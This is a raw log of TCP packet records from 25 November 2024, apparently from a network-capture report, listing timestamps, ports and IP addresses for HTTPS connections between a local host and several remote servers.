                                                                                                                          Nov 25, 2024 16:42:38.017950058 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.018009901 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.024384975 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.024450064 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.027777910 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.027836084 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.034163952 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.034239054 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.040477991 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.040544033 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.043827057 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.043884993 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.050297976 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.050365925 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.052369118 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.052431107 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.052453995 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.052539110 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.052545071 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.052567005 CET44349763104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.052594900 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.052594900 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.052628994 CET49763443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.064887047 CET49766443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:38.064960957 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.065028906 CET49766443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:38.065262079 CET49766443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:38.065295935 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.075158119 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.075624943 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:38.075654984 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.076786995 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.077169895 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:38.077320099 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:38.077332020 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.077358961 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.132131100 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:38.578735113 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.578936100 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.579009056 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:38.580893040 CET49764443192.168.2.4172.67.177.19
                                                                                                                          Nov 25, 2024 16:42:38.580929041 CET44349764172.67.177.19192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.649885893 CET49767443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.649960041 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.650063992 CET49767443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.650305986 CET49767443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:38.650341034 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.722661018 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:38.722708941 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.722774982 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:38.722974062 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:38.722992897 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.318442106 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.318969011 CET49766443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:39.319042921 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.319360971 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.320211887 CET49766443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:39.320285082 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.320499897 CET49766443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:39.367335081 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.855936050 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.855995893 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.857266903 CET49766443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:39.857482910 CET49766443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:39.857526064 CET44349766104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.971143961 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.971559048 CET49767443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:39.971582890 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.972107887 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.972481012 CET49767443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:39.972575903 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:39.972631931 CET49767443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:40.019349098 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.127646923 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.127960920 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.128000975 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.129712105 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.129791021 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.130937099 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.131025076 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.131170988 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.131181002 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.178648949 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.452122927 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.452290058 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.452358007 CET49767443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:40.454148054 CET49767443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:40.454174995 CET44349767104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.468806982 CET49770443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:40.468858957 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.469078064 CET49770443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:40.469443083 CET49770443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:40.469460011 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.595602036 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.595849037 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.595906973 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.615745068 CET49768443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.615773916 CET4434976835.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.616669893 CET49771443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.616756916 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.616843939 CET49771443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.617208004 CET49771443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:40.617245913 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.618397951 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:40.618482113 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:40.618555069 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:40.618769884 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:40.618804932 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.691004992 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.691335917 CET49770443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:41.691375971 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.691831112 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.692167044 CET49770443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:41.692255974 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.692410946 CET49770443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:41.739330053 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.882165909 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.882432938 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:41.882472038 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.882936954 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.883294106 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:41.883392096 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.883495092 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:41.926199913 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.926449060 CET49771443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:41.926491976 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.926809072 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.927439928 CET49771443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:41.927506924 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.927978039 CET49771443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:41.931335926 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:41.975330114 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.142235994 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.142314911 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.142385960 CET49770443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:42.143188953 CET49770443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:42.143203974 CET44349770104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.352654934 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.352905989 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.352952957 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:42.352981091 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.353075981 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.353125095 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:42.354125023 CET49772443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:42.354140043 CET44349772104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.419193029 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.419262886 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.419450998 CET49771443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:42.419986010 CET49771443192.168.2.435.190.80.1
                                                                                                                          Nov 25, 2024 16:42:42.420027971 CET4434977135.190.80.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.828037977 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:42.828102112 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:42.828182936 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:42.828423023 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:42.828439951 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.151451111 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.201484919 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.228152037 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.228163958 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.228828907 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.229553938 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.229648113 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.230026960 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.230118036 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.230148077 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.230221987 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.230228901 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.231410027 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.231448889 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.934194088 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.934257030 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.934293985 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.934312105 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.934329987 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.934365988 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.934381962 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.934389114 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.934436083 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.934442997 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.942985058 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.943034887 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.943042040 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.960438967 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:44.960485935 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:44.960491896 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.011569977 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:45.054364920 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.104748011 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:45.104759932 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.147958994 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.148044109 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:45.148053885 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.154241085 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.154362917 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:45.154370070 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.162404060 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.162451982 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:45.162458897 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.170077085 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.170124054 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:45.170130968 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.170170069 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.170209885 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:45.170433044 CET49773443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:45.170444012 CET44349773104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.191692114 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:45.191747904 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:45.191842079 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:45.192058086 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:45.192074060 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:46.502522945 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:46.504421949 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:46.504451036 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:46.504928112 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:46.505702019 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:46.505784035 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:46.505871058 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:46.551331997 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:46.570044041 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:47.026825905 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:47.027014017 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:47.027081966 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:47.027566910 CET49774443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:47.027601004 CET44349774104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:53.750689030 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:53.750751019 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:53.750850916 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:53.751147985 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:53.751164913 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.014519930 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.014883041 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.014899015 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.016192913 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.016952038 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.016952038 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.016966105 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.017029047 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.017151117 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.017301083 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.017379045 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.776624918 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.776817083 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.776999950 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.777095079 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.777113914 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.777190924 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.777199030 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.777250051 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.778692961 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.778692961 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:55.798136950 CET49776443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:55.798176050 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.798238039 CET49776443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:55.798455000 CET49776443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:55.798468113 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:56.086323977 CET49775443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:56.086349010 CET44349775104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:56.277657986 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:56.277703047 CET44349777104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:56.277777910 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:56.278076887 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:56.278114080 CET44349777104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.032819986 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.033112049 CET49776443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:57.033126116 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.033401966 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.033720970 CET49776443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:57.033776999 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.033870935 CET49776443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:57.079324961 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.478713989 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.478869915 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.478950977 CET49776443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:57.479887009 CET49776443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:57.479896069 CET44349776104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.536322117 CET44349777104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.536662102 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.536691904 CET44349777104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.538130045 CET44349777104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.538193941 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.538522005 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.538537979 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.538583994 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.538602114 CET44349777104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.538836002 CET44349777104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.538840055 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.538871050 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.538875103 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.538903952 CET49777443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.538945913 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.539129972 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:57.539140940 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:58.756714106 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:58.756956100 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:58.756988049 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:58.758482933 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:58.758550882 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:58.759614944 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:58.759692907 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:58.759816885 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:58.759824991 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:58.807784081 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:59.645369053 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:59.645442009 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:59.645684004 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:59.646507978 CET49778443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:59.646529913 CET44349778104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:59.812156916 CET49779443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:59.812244892 CET44349779104.21.65.72192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:59.812321901 CET49779443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:59.812601089 CET49779443192.168.2.4104.21.65.72
                                                                                                                          Nov 25, 2024 16:42:59.812623024 CET44349779104.21.65.72192.168.2.4
